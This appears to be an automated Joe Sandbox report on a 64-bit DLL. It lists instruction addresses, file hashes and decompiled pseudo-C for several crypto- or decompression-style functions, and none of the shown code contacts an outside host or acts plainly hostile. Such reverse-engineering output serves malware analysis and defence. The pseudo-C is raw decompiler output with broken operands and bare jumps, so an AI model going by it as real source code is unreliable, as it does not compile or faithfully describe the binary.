0x7fef30606af
0x7fef30606b7
0x7fef30606bb
0x7fef30606c0
0x7fef30606c6
0x7fef30606cb
0x7fef30606d0
0x7fef30606d4
0x7fef30606e1
0x7fef30606ea
0x7fef30606f6
0x7fef3060702
0x7fef3060713
0x7fef306071a
0x7fef306071e
0x7fef3060721
0x7fef3060726
0x7fef306072e
0x7fef3060731
0x7fef3060736
0x7fef3060739
0x7fef306073e
0x7fef3060741
0x7fef306074b
0x7fef3060755
0x7fef306075d
0x7fef3060765
0x7fef306076d
0x7fef3060770
0x7fef3060777
0x7fef3060780
0x7fef3060787
0x7fef306078a
0x7fef306079b
0x7fef30607a3
0x7fef30607ad
0x7fef30607ba
0x7fef30607c3
0x7fef30607c7
0x7fef30607d0
0x7fef30607e1
0x7fef30607e3
0x7fef30607ef
0x7fef30607f3
0x7fef3060800
0x7fef3060808
0x7fef3060813
0x7fef306081e
0x7fef3060827
0x7fef306082b
0x7fef3060833
0x7fef3060839
0x7fef3060846
0x7fef3060848
0x7fef306084e
0x7fef3060856
0x7fef306085c
0x7fef306085e
0x7fef3060862
0x7fef3060866
0x7fef306086a
0x7fef306086c
0x7fef3060877
0x7fef306087d
0x7fef3060892
0x7fef306089e
0x7fef30608a3
0x7fef30608aa
0x7fef30608b4
0x7fef30608bf
0x7fef30608c8
0x7fef30608d4
0x7fef30608e2
0x7fef30608fc
0x7fef306090e
0x7fef3060932
0x7fef306093d
0x7fef3060948
0x7fef3060953
0x7fef306095c
0x7fef3060960
0x7fef3060968
0x7fef306096e
0x7fef306097b
0x7fef3060988
0x7fef306098d
0x7fef306099a
0x7fef30609aa
0x7fef30609b1
0x7fef30609b9
0x7fef30609be
0x7fef30609ca
0x7fef30609f3
0x7fef30609f6
0x7fef30609fd
0x7fef3060a01
0x7fef3060a09
0x7fef3060a13
0x7fef3060a19
0x7fef3060a20
0x7fef3060a30
0x7fef3060a35
0x7fef3060a3a
0x7fef3060a3d
0x7fef3060a48
0x7fef3060a83
0x7fef3060a89
0x7fef3060a8e
0x7fef3060a95
0x7fef3060a9a
0x7fef3060aa2
0x7fef3060aa7
0x7fef3060aac
0x7fef3060aaf
0x7fef3060abc
0x7fef3060ac1
0x7fef3060ac7
0x7fef3060ad0
0x7fef3060ad5
0x7fef3060ade
0x7fef3060ae6
0x7fef3060aea
0x7fef3060af6
0x7fef3060afe
0x7fef3060b0b
0x7fef3060b14
0x7fef3060b18
0x7fef3060b21
0x7fef3060b27
0x7fef3060b34
0x7fef3060b39
0x7fef3060b3e
0x7fef3060b47
0x7fef3060b4e
0x7fef3060b52
0x7fef3060b56
0x7fef3060b59
0x7fef3060b63
0x7fef3060b66
0x7fef3060b6b
0x7fef3060b73
0x7fef3060b77
0x7fef3060b7b
0x7fef3060b80
0x7fef3060b85
0x7fef3060b8b
0x7fef3060b8e
0x7fef3060b92
0x7fef3060b97
0x7fef3060b9f
0x7fef3060ba4
0x7fef3060ba8
0x7fef3060bab
0x7fef3060bae
0x7fef3060bb3
0x7fef3060bb5
0x7fef3060bb9
0x7fef3060bbc
0x7fef3060bbf
0x7fef3060bc1
0x7fef3060bc5
0x7fef3060bc8
0x7fef3060bcb
0x7fef3060bd0
0x7fef3060bd3
0x7fef3060bd8
0x7fef3060bdb
0x7fef3060bde
0x7fef3060be3
0x7fef3060be6
0x7fef3060beb
0x7fef3060bee
0x7fef3060bf1
0x7fef3060bf3
0x7fef3060bf7
0x7fef3060bfa
0x7fef3060bfd
0x7fef3060bff
0x7fef3060c03
0x7fef3060c06
0x7fef3060c09
0x7fef3060c0b
0x7fef3060c0e
0x7fef3060c19
0x7fef3060c1b
0x7fef3060c1f
0x7fef3060c22
0x7fef3060c25
0x7fef3060c27
0x7fef3060c2b
0x7fef3060c2e
0x7fef3060c47
0x7fef3060c49
0x7fef3060c52
0x7fef3060c68
0x7fef3060c73
0x7fef3060c76
0x7fef3060c7f
0x7fef3060c83
0x7fef3060c90
0x7fef3060c98
0x7fef3060c9a
0x7fef3060ca5
0x7fef3060cae
0x7fef3060cb1
0x7fef3060cb6
0x7fef3060cb9
0x7fef3060cbb
0x7fef3060cc0
0x7fef3060cc7
0x7fef3060cdd
0x7fef3060ce5
0x7fef3060ced
0x7fef3060cf5
0x7fef3060cf9
0x7fef3060cfc
0x7fef3060cff
0x7fef3060d0a
0x7fef3060d10
0x7fef3060d13
0x7fef3060d1c
0x7fef3060d1f
0x7fef3060d25
0x7fef3060d2d
0x7fef3060d3d
0x7fef3060d43
0x7fef3060d47
0x7fef3060d4a
0x7fef3060d52
0x7fef3060d55
0x7fef3060d5d
0x7fef3060d68
0x7fef3060d80
0x7fef3060d88
0x7fef3060d9d
0x7fef3060da0
0x7fef3060da5
0x7fef3060dae
0x7fef3060db6
0x7fef3060dbe
0x7fef3060dc2
0x7fef3060dca
0x7fef3060dd3
0x7fef3060de7
0x7fef3060dfe
0x7fef3060e05
0x7fef3060e0c
0x7fef3060e13
0x7fef3060e1a
0x7fef3060e25
0x7fef3060e2d
0x7fef3060e38
0x7fef3060e3a
0x7fef3060e42
0x7fef3060e53
0x7fef3060e5a
0x7fef3060e61
0x7fef3060e65
0x7fef3060e6b
0x7fef3060e6f
0x7fef3060e8f
0x7fef3060e91
0x7fef3060e98
0x7fef3060e98
0x7fef3060e9c
0x7fef3060ea3
0x7fef3060ec1
0x7fef3060ec8
0x7fef3060ed3
0x7fef3060ee9
0x7fef3060ef5
0x7fef3060ef8
0x7fef3060efe
0x7fef3060f06
0x7fef3060f1e
0x7fef3060f23
0x7fef3060f2b
0x7fef3060f33
0x7fef3060f38
0x7fef3060f3e
0x7fef3060f54
0x7fef3060f5b
0x7fef3060f62
0x7fef3060f69
0x7fef3060f79
0x7fef3060f80
0x7fef3060f80
0x7fef3060f84
0x7fef3060f8b
0x7fef3060f8d
0x7fef3060f95
0x7fef3060f9f
0x7fef3060fa6
0x7fef3060fad
0x7fef3060fad
0x7fef3060fb1
0x7fef3060fb4
0x7fef3060fb8
0x7fef3060fc2
0x7fef3060fe9
0x7fef3060ff1
0x7fef3060ff8
0x7fef3060ff8
0x7fef3060ffc
0x7fef3061003
0x7fef306100c
0x7fef3061033
0x7fef306103a
0x7fef306103a
0x7fef306103e
0x7fef3061045
0x7fef3061051
0x7fef3061059
0x7fef3061060
0x7fef306107e
0x7fef3061097
0x7fef30610a8
0x7fef30610bb
0x7fef30610c2
0x7fef30610c4
0x7fef30610d6
0x7fef30610eb
0x7fef30610f2
0x7fef30610f7
0x7fef30610ff
0x7fef3061101
0x7fef3061109
0x7fef306112c
0x7fef3061137
0x7fef3061139
0x7fef306113d
0x7fef3061140
0x7fef3061142
0x7fef3061156
0x7fef306115c
0x7fef3061160
0x7fef3061163
0x7fef3061167
0x7fef3061177
0x7fef3061188
0x7fef306118c
0x7fef306118f
0x7fef30611a6

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 246093abe70e55a3bf3bcc027cbf88afa9cb302397b7a08a30a1af9159731be7
Instruction ID: c65015b32fa8ca99507db39ecc1ff5a37230fc57b6dfdd5bb71644c413a26c09
Opcode Fuzzy Hash: 246093abe70e55a3bf3bcc027cbf88afa9cb302397b7a08a30a1af9159731be7
Instruction Fuzzy Hash: 6E02E872B0C3958BE7A48F19E4407BAB7D6F784754F148236DA9987BD8D63DE440EB00

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30A17B0 Relevance: .4, Instructions: 422
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E000007FE7FEF30A17B0(signed char** __rcx) {
				void* _t14;
				signed char* _t22;
				signed char* _t23;

				_t22 =  *__rcx;
				_t23 = __rcx[1];
				if (_t23 == 0) goto 0xf30a17f2;
				r13d =  *_t22 & 0x000000ff;
				dil = r13d == 0x30;
				r13d = r13d + 0xffffffd0;
				_t14 = r13d - 0xa;
				if (_t14 >= 0) goto 0xf30a17f6;
				if ((0 | _t14 > 0x00000000) == 1) goto 0xf30a1801;
				goto 0xf30a180a;
				if (0 != 1) goto 0xf30a180a;
				if (r13d - 0xff <= 0) goto 0xf30a1820;
				 *__rcx = _t22;
				__rcx[1] = _t23;
				return 0;
			}

0x7fef30a17bc
0x7fef30a17bf
0x7fef30a17c6
0x7fef30a17c8
0x7fef30a17d0
0x7fef30a17d4
0x7fef30a17da
0x7fef30a17e1
0x7fef30a17ee
0x7fef30a17f0
0x7fef30a17ff
0x7fef30a1808
0x7fef30a180a
0x7fef30a180d
0x7fef30a181f

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 391ccc49cf303a3d6efc79c726c7feda35849ee7bbec369c00a786680509187a
Instruction ID: b407444076d40e37d0284f8744ac2069b87af440921c9f0276ced8501b882245
Opcode Fuzzy Hash: 391ccc49cf303a3d6efc79c726c7feda35849ee7bbec369c00a786680509187a
Instruction Fuzzy Hash: 93D1F337E1C5660AFEED0634F64837D51C69735392F1D5633D9AE462F0E11EA846F240

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF3053D50 Relevance: .4, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 369d6deb746a02e6a6e110440c38fe77be348f92fbbdf7093bc85b6bc68109d1
Instruction ID: 4e7d2e2827e74a4333070035def6d0d1e49566667a942198c2178f0e07e2f4d9
Opcode Fuzzy Hash: 369d6deb746a02e6a6e110440c38fe77be348f92fbbdf7093bc85b6bc68109d1
Instruction Fuzzy Hash: 1EE158A6E2976209EBA3473A95123B4A5805F677E0F44C337ED7E31AF1E72DE1825204

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF305F2D4 Relevance: .4, Instructions: 410
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E000007FE7FEF305F2D4(void* _a40, intOrPtr _a48, intOrPtr _a56, signed int _a64) {
				long long _v72;
				long long _v80;
				long long _v104;
				long long _v112;
				signed long long _v120;
				long long _v128;
				signed int _v132;
				long long _v144;
				long long _v152;
				long long _v160;
				signed long long _v192;
				signed int _v252;
				intOrPtr _v268;
				signed char _v273;
				long long _v288;
				intOrPtr _v296;
				intOrPtr _v308;
				intOrPtr _v312;
				signed int _v316;
				intOrPtr _v320;
				long long _v328;
				signed int _t60;
				signed long long _t79;
				signed long long _t89;
				signed long long _t90;
				long long _t91;
				long long _t93;
				intOrPtr _t94;
				long long _t98;
				long long _t99;

				_t99 = _t93;
				_t94 = _a48;
				_t78 =  <  ? _t89 : _t94 - 1;
				asm("dec eax");
				_t90 = _t89 | ( <  ? _t89 : _t94 - 1);
				_t3 = _t90 + 1; // 0x1
				_t79 = _t3;
				_v192 = _t90;
				if ((_t79 & _t90) != 0) goto 0xf3060b85;
				if (_a56 - _t94 > 0) goto 0xf3060b85;
				_v120 = _t79;
				_v132 = _a64 & 0x00000004;
				_v104 = _t91;
				_v152 = _t98;
				r12b =  *((intOrPtr*)(_t99 + 0x291c));
				_t60 =  *(_t99 + 0x24);
				_v328 =  *_t99;
				_v320 =  *((intOrPtr*)(_t99 + 8));
				_v316 = _t60;
				_v312 =  *((intOrPtr*)(_t99 + 0x28));
				_v308 =  *((intOrPtr*)(_t99 + 0x2c));
				_t69 =  ==  ? 0xfc02 : 0x102;
				_t57 =  ==  ? 0xfc : 1;
				_v268 =  ==  ? 0xfc : 1;
				_v296 = 0x102;
				_t70 = ( ==  ? 0xfc02 : 0x102) & 0x0000fd00;
				_v252 = ( ==  ? 0xfc02 : 0x102) & 0x0000fd00;
				_v144 = _t99 + 0x2921;
				_v160 = _t99 + 0xcbc;
				_v128 = _t99 + 0x1a5c;
				_v80 = _t99 + 0x27fc;
				_v72 = _t99 + 0xd4c;
				_v112 = _t99 + 0xdbc;
				_v273 = (_t60 & 0xffffff00 | (sil & 0x00000001) == 0x00000000) + (_t60 & 0xffffff00 | (sil & 0x00000001) == 0x00000000) | 0x00000001;
				_v288 = _t99;
				if (r12b - 0x18 > 0) goto 0xf3060c5a;
				goto __rax;
			}

0x7fef305f2e7
0x7fef305f2f1
0x7fef305f307
0x7fef305f30f
0x7fef305f312
0x7fef305f315
0x7fef305f315
0x7fef305f319
0x7fef305f324
0x7fef305f338
0x7fef305f33e
0x7fef305f346
0x7fef305f34d
0x7fef305f35d
0x7fef305f36a
0x7fef305f378
0x7fef305f384
0x7fef305f389
0x7fef305f38d
0x7fef305f391
0x7fef305f395
0x7fef305f3ae
0x7fef305f3bb
0x7fef305f3be
0x7fef305f3c2
0x7fef305f3c6
0x7fef305f3cc
0x7fef305f3d7
0x7fef305f3e6
0x7fef305f3f5
0x7fef305f404
0x7fef305f413
0x7fef305f422
0x7fef305f42f
0x7fef305f436
0x7fef305f441
0x7fef305f459

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0ffe25c49199f029a7dcac8f681fc11626595cb1f0245847fa5c9cf8a1aca56
Instruction ID: 4faea9ee4144ac54a3d33b618d00ad3659bf310a423a457bce7ef43bc22ccad4
Opcode Fuzzy Hash: d0ffe25c49199f029a7dcac8f681fc11626595cb1f0245847fa5c9cf8a1aca56
Instruction Fuzzy Hash: A702E273B0C7C58AD7A48F19E4407AAB7E6F788754F148236DA9D43BA8EA3DD440DB00

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF305FDC1 Relevance: .4, Instructions: 408
COMMONCrypto

Download Yara Rule

C-Code - Quality: 40%

			E000007FE7FEF305FDC1(void* __eflags, signed int __rdi, signed int __rsi, void* __r8, void* __r10, void* __r11, void* __r12, long long __r13, void* __r14, void* __r15) {
				signed int _t432;
				signed char _t433;
				signed char _t434;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				signed char _t439;
				signed char _t446;
				signed int _t454;
				signed int _t457;
				signed int _t460;
				unsigned int _t465;
				signed int _t466;
				short _t468;
				signed int _t482;
				signed short _t484;
				signed int _t485;
				signed int _t487;
				signed int _t495;
				signed short _t497;
				signed char _t506;
				signed int _t512;
				signed int _t515;
				unsigned int _t519;
				signed int _t548;
				signed int _t551;
				signed char _t552;
				signed int _t561;
				signed char _t568;
				unsigned int _t587;
				signed int _t588;
				short _t590;
				signed char _t605;
				signed char _t607;
				signed int _t611;
				signed int _t612;
				signed char _t614;
				signed char _t620;
				signed int _t624;
				signed char _t628;
				signed int _t631;
				signed char _t650;
				unsigned int _t657;
				signed char _t659;
				signed int _t669;
				signed int _t675;
				signed int _t688;
				signed int _t689;
				signed int _t697;
				signed short _t699;
				signed int _t701;
				signed short _t704;
				signed int _t709;
				signed int _t710;
				signed short _t713;
				void* _t717;
				signed int _t720;
				signed int _t724;
				signed int _t731;
				signed int _t734;
				signed int _t737;
				signed char _t739;
				signed int _t759;
				signed int _t761;
				signed int _t785;
				signed int _t788;
				signed short _t800;
				void* _t805;
				void* _t808;
				void* _t831;
				signed int _t841;
				void* _t843;
				void* _t872;
				short _t880;
				void* _t885;
				signed int _t913;
				signed int _t914;
				void* _t918;
				void* _t921;
				void* _t923;
				signed int _t931;
				void* _t935;
				signed long long _t938;
				signed long long _t942;
				signed long long _t943;
				signed long long _t949;
				signed long long _t950;
				long long _t966;
				signed int _t975;
				signed long long _t976;
				signed long long _t977;
				signed long long _t981;
				signed long long _t982;
				signed long long _t983;
				signed long long _t984;
				signed long long _t985;
				signed long long _t986;
				signed long long _t987;
				signed long long _t989;
				void* _t990;
				long long* _t997;
				void* _t1001;
				long long _t1002;
				signed long long _t1004;
				signed long long _t1008;
				signed long long _t1009;
				signed long long _t1018;
				signed long long _t1022;
				intOrPtr _t1030;
				void* _t1032;
				long long _t1035;
				signed long long _t1036;
				intOrPtr _t1037;
				signed long long _t1039;
				signed long long _t1046;
				unsigned long long _t1050;
				signed long long _t1054;
				unsigned long long _t1055;
				signed long long _t1063;
				unsigned long long _t1066;
				unsigned long long _t1067;
				intOrPtr _t1076;
				signed long long _t1081;
				unsigned long long _t1083;
				signed long long _t1090;
				signed long long _t1091;
				signed long long _t1095;
				signed long long _t1099;
				intOrPtr _t1101;
				void* _t1103;
				signed long long _t1112;
				long long _t1117;
				void* _t1118;
				signed long long _t1121;
				signed char* _t1126;
				signed long long _t1130;
				signed long long _t1131;
				signed long long _t1132;
				signed long long _t1133;
				signed long long _t1135;
				void* _t1140;
				signed long long _t1151;
				void* _t1153;
				void* _t1156;
				void* _t1157;
				long long _t1158;
				void* _t1162;
				intOrPtr _t1165;
				void* _t1167;
				intOrPtr _t1174;
				intOrPtr _t1177;
				long long _t1179;
				signed char* _t1182;
				intOrPtr _t1185;
				intOrPtr _t1186;
				intOrPtr _t1187;
				intOrPtr _t1189;
				signed long long _t1190;
				long long _t1195;
				signed char* _t1198;
				long long _t1206;
				signed char* _t1209;
				void* _t1213;
				void* _t1214;
				void* _t1218;
				void* _t1221;
				void* _t1222;
				void* _t1226;
				void* _t1227;
				signed int* _t1228;
				signed long long _t1234;

				_t568 =  *(_t1153 + 0x38);
				if (__eflags >= 0) goto 0xf30604e6;
				if (__r14 == __r15) goto 0xf305fe03;
				_t1131 = _t1130 << _t568;
				 *(_t1153 + 0x30) =  *(_t1153 + 0x30) | _t1131;
				 *(_t1153 + 0x38) = _t568 + 8;
				_t1213 = __r14 + 1;
				goto 0xf305fe08;
				if ((bpl & 0x00000002) == 0) goto 0xf305fdd5;
				_t1046 =  *((intOrPtr*)(_t1153 + 0x1a8));
				_t1018 = __r15 - _t1213;
				if (_t1018 - 4 < 0) goto 0xf306060d;
				_t935 = _t1046 - __r8;
				if (_t935 - 2 < 0) goto 0xf306060d;
				if (_t935 - 0x103 < 0) goto 0xf305fe4d;
				if (_t1018 - 0xd > 0) goto 0xf3060750;
				_t432 =  *(_t1153 + 0x38);
				if (_t935 - 0x1e >= 0) goto 0xf305fe76;
				_t1214 = _t1213 + 4;
				 *(_t1153 + 0x30) = _t1046 << _t432 |  *(_t1153 + 0x30);
				_t433 = _t432 + 0x20;
				 *(_t1153 + 0x38) = _t433;
				goto 0xf305fe7b;
				_t697 =  *((short*)(__r10 + 0x3c + _t1018 * 2));
				if (_t697 < 0) goto 0xf305fea3;
				if ((_t697 & 0x0000ffff) - 0x200 < 0) goto 0xf306073e;
				goto 0xf305fecf;
				asm("dec eax");
				asm("adc edi, 0x0");
				if ( !_t697 - 0x23f > 0) goto 0xf30611c7;
				_t699 =  *((short*)(__r10 + 0x83c + __rdi * 2));
				_t800 = _t699;
				if (_t800 < 0) goto 0xf305fea8;
				 *(_t1153 + 0x40) = _t699 & 0x0000ffff;
				_t1050 =  *(_t1153 + 0x30) >> 0xb;
				 *(_t1153 + 0x30) = _t1050;
				_t434 = _t433 - 0xb;
				 *(_t1153 + 0x38) = _t434;
				r12b = 0x15;
				asm("bt edi, 0x8");
				if (_t800 < 0) goto 0xf305f43b;
				_t724 =  *((short*)(__r10 + 0x3c + _t1018 * 2));
				if (_t724 < 0) goto 0xf305ff16;
				if ((_t724 & 0x0000ffff) - 0x200 < 0) goto 0xf306073e;
				goto 0xf305ff42;
				asm("dec eax");
				asm("adc esi, 0x0");
				if ( !_t724 - 0x23f > 0) goto 0xf3061207;
				if ( *((short*)(__r10 + 0x83c + __rsi * 2)) < 0) goto 0xf305ff1b;
				 *(_t1153 + 0x30) = _t1050 >> 0xb;
				 *(_t1153 + 0x38) = _t434 - 0xb;
				_t805 = __r8 -  *((intOrPtr*)(_t1153 + 0x1a8));
				if (_t805 >= 0) goto 0xf3061284;
				 *((intOrPtr*)(__r11 + __r8)) = dil;
				asm("bt esi, 0x8");
				if (_t805 < 0) goto 0xf3060a8e;
				if (__r8 + 1 -  *((intOrPtr*)(_t1153 + 0x1a8)) >= 0) goto 0xf30612a2;
				 *((intOrPtr*)(__r11 + __r8 + 1)) = sil;
				_t1156 = __r8 + 2;
				_t436 =  *(_t1153 + 0x40);
				r12b = 0x15;
				if (_t436 - 0xff > 0) goto 0xf305f43b;
				_t808 = _t1156 -  *((intOrPtr*)(_t1153 + 0x1a8));
				if (_t808 == 0) goto 0xf3061262;
				if (_t808 >= 0) goto 0xf3061284;
				 *(__r11 + _t1156) = _t436;
				_t1157 = _t1156 + 1;
				r12b = 0xc;
				_t437 =  *(_t1153 + 0x38);
				if (_t437 - 0xe > 0) goto 0xf30600a1;
				_t1022 = __r15 - _t1214;
				if (_t1022 - 1 > 0) goto 0xf3060085;
				_t587 =  *((short*)(__r10 + 0xddc + _t1022 * 2));
				if (_t587 < 0) goto 0xf3060019;
				if ((_t587 & 0x0000ffff) - 0x200 < 0) goto 0xf3060056;
				_t588 = _t587 >> 9;
				if (_t437 - _t588 < 0) goto 0xf3060056;
				goto 0xf30600a1;
				if (_t437 - 0xb < 0) goto 0xf3060056;
				asm("dec eax");
				asm("adc ecx, 0x0");
				if ( !_t588 - 0x23f > 0) goto 0xf30611b9;
				_t590 =  *((short*)(__r10 + 0x15dc + _t1022 * 2));
				if (_t590 >= 0) goto 0xf3060051;
				if (_t437 - 0xc >= 0) goto 0xf3060023;
				if (_t590 >= 0) goto 0xf30600a1;
				if (_t1214 == __r15) goto 0xf3060156;
				_t1132 = _t1131 << _t437;
				_t1054 =  *(_t1153 + 0x30) | _t1132;
				 *(_t1153 + 0x30) = _t1054;
				_t438 = _t437 + 8;
				 *(_t1153 + 0x38) = _t438;
				if (_t438 - 0xe <= 0) goto 0xf305ffed;
				goto 0xf30600a1;
				_t1133 = _t1132 << _t438;
				_t1055 = _t1054 | _t1133;
				 *(_t1153 + 0x30) = _t1055;
				_t439 = _t438 + 0x10;
				 *(_t1153 + 0x38) = _t439;
				_t701 =  *((short*)(__r10 + 0xddc + _t1022 * 2));
				if (_t701 < 0) goto 0xf30600c3;
				goto 0xf30600ef;
				asm("dec eax");
				asm("adc edi, 0x0");
				if ( !(_t701 & 0x000001ff) - 0x23f > 0) goto 0xf30611c7;
				_t704 =  *((short*)(__r10 + 0x15dc + __rdi * 2));
				if (_t704 < 0) goto 0xf30600c8;
				if (0xa == 0) goto 0xf30606cb;
				 *(_t1153 + 0x30) = _t1055 >> 0xb;
				 *(_t1153 + 0x38) = _t439 - 0xb;
				if ((_t704 & 0x0000ffff) - 0x1d > 0) goto 0xf306013e;
				 *(_t1153 + 0x44) =  *(__rdi + 0xf311ef48) & 0x000000ff;
				 *(_t1153 + 0x3c) =  *(0xf311ef68 + __rdi * 2) & 0x0000ffff;
				_t603 =  ==  ? 0x1601 : 0x1001;
				r12d = 0x2101;
				r12d = r12d & 0x00003700;
				_t827 =  ==  ? 0x1601 : 0x1001;
				if (( ==  ? 0x1601 : 0x1001) == 0) goto 0xf305ffd4;
				goto 0xf3060485;
				r12d =  *(_t1153 + 0x7c);
				goto 0xf3060149;
				_t605 =  *(_t1153 + 0x38);
				_t551 =  *(_t1153 + 0x50);
				if (_t605 - 8 >= 0) goto 0xf3060565;
				if (__r15 == __r15) goto 0xf306019f;
				 *(_t1153 + 0x30) =  *(_t1153 + 0x30) | _t1133 << _t605;
				 *(_t1153 + 0x38) = _t605 + 8;
				_t1218 = __r15 + 1;
				goto 0xf30601a4;
				if ((bpl & 0x00000002) == 0) goto 0xf3060172;
				_t938 =  *((intOrPtr*)(_t1153 + 0x1a8));
				_t831 = _t1157 - _t938;
				if (_t831 == 0) goto 0xf3061238;
				if (_t831 >= 0) goto 0xf3061284;
				 *((char*)(__r11 + _t1157)) =  *(_t1153 + 0x3c);
				_t1158 = _t1157 + 1;
				r12d = 0x11;
				r12d =  ==  ? 6 : r12d;
				 *(_t1153 + 0x40) =  *(_t1153 + 0x40) - 1;
				r12d =  ==  ? 6 : r12d;
				 *((long long*)(_t1153 + 0x70)) = __r13;
				r13d =  *(_t1153 + 0x3c);
				_t1135 =  *((intOrPtr*)(_t1153 + 0x1a8));
				if (_t1158 == _t1135) goto 0xf3060b97;
				_t1001 = _t1135 - _t1158;
				_t1117 = _t1158;
				_t1002 =  >=  ? _t938 : _t1001;
				 *((long long*)(_t1153 + 0x28)) =  *(_t1153 + 0xb8);
				 *((long long*)(_t1153 + 0x20)) = _t1002;
				_t1179 = _t1117;
				E000007FE7FEF30616A0();
				_t1185 =  *((intOrPtr*)(_t1153 + 0x58));
				_t1162 = _t1117 + _t1002;
				r12b = 0xc;
				 *(_t1153 + 0x40) =  *(_t1153 + 0x40) - _t551;
				if (_t1001 != _t938) goto 0xf3060208;
				_t1206 =  *((intOrPtr*)(_t1153 + 0x70));
				r12b = 3;
				if ( *((intOrPtr*)(_t1185 + 0x18)) == 0) goto 0xf305f43b;
				_t607 =  *(_t1153 + 0x38);
				_t1101 =  *((intOrPtr*)(_t1153 + 0xe0));
				_t759 =  >=  ? r14d : _t607 >> 3;
				_t552 = _t1135 * 8;
				_t446 = (_t607 & 0xfffffff8) - _t552;
				 *(_t1153 + 0x38) = _t446;
				_t1221 = _t1218 - __r15 + _t1101 - _t1135;
				if (_t1221 - _t1101 > 0) goto 0xf30613c7;
				_t1222 = _t1221 + _t1206;
				 *(_t1153 + 0x30) =  !(0xffffffff << (_t446 & 0x00000038)) &  *(_t1153 + 0x30) >> (_t607 & 0x00000007);
				r12b = 0x18;
				if (( *(_t1153 + 0x1b8) & 0x00000001) == 0) goto 0xf305f43b;
				 *(_t1153 + 0x40) = 0;
				r12b = 0x17;
				_t611 =  *(_t1153 + 0x40) & 0x000001ff;
				 *(_t1153 + 0x40) = _t611;
				r12b = 0x14;
				if (_t611 == 0x100) goto 0xf305f43b;
				r12b = 0x20;
				if (_t611 - 0x11d > 0) goto 0xf305f43b;
				_t612 =  *(_t938 + 0xf311eee8) & 0x000000ff;
				_t841 = _t612;
				r12b = _t841 == 0;
				 *(_t1153 + 0x44) = _t612;
				 *(_t1153 + 0x40) =  *(0xf311ef08 + _t938 * 2) & 0x0000ffff;
				r12b = r12b | 0x0000000e;
				r9d =  *(_t1153 + 0x3c);
				if (_t841 >= 0) goto 0xf3060382;
				r12b = 0x1d;
				if ( *((intOrPtr*)(_t1153 + 0xf4)) != 0) goto 0xf305f43b;
				_t1118 = _t1162 + 0xf311ef08;
				_t1063 =  *((intOrPtr*)(_t1153 + 0x1a8));
				_t843 = _t1118 - _t1063;
				if (_t843 > 0) goto 0xf30603b1;
				_t942 = (_t1162 - _t1179 &  *(_t1153 + 0xb8)) - _t1162;
				if (_t843 < 0) goto 0xf3060a9a;
				if (_t942 - 0xf311ef08 >= 0) goto 0xf3060a9a;
				r12d = 0x13;
				r12d =  ==  ? 0xc : r12d;
				_t454 =  *(_t1153 + 0x40);
				_t709 =  *(_t1153 + 0x50);
				if (_t454 - 3 > 0) goto 0xf3060605;
				_t614 =  *(_t1153 + 0x38);
				if (_t614 == 0) goto 0xf3060421;
				_t1140 = _t1222;
				if (_t614 - 8 >= 0) goto 0xf3060436;
				if (_t1140 == __r15) goto 0xf3060413;
				_t1004 =  *(_t1153 + 0x30) | _t1063 << _t614;
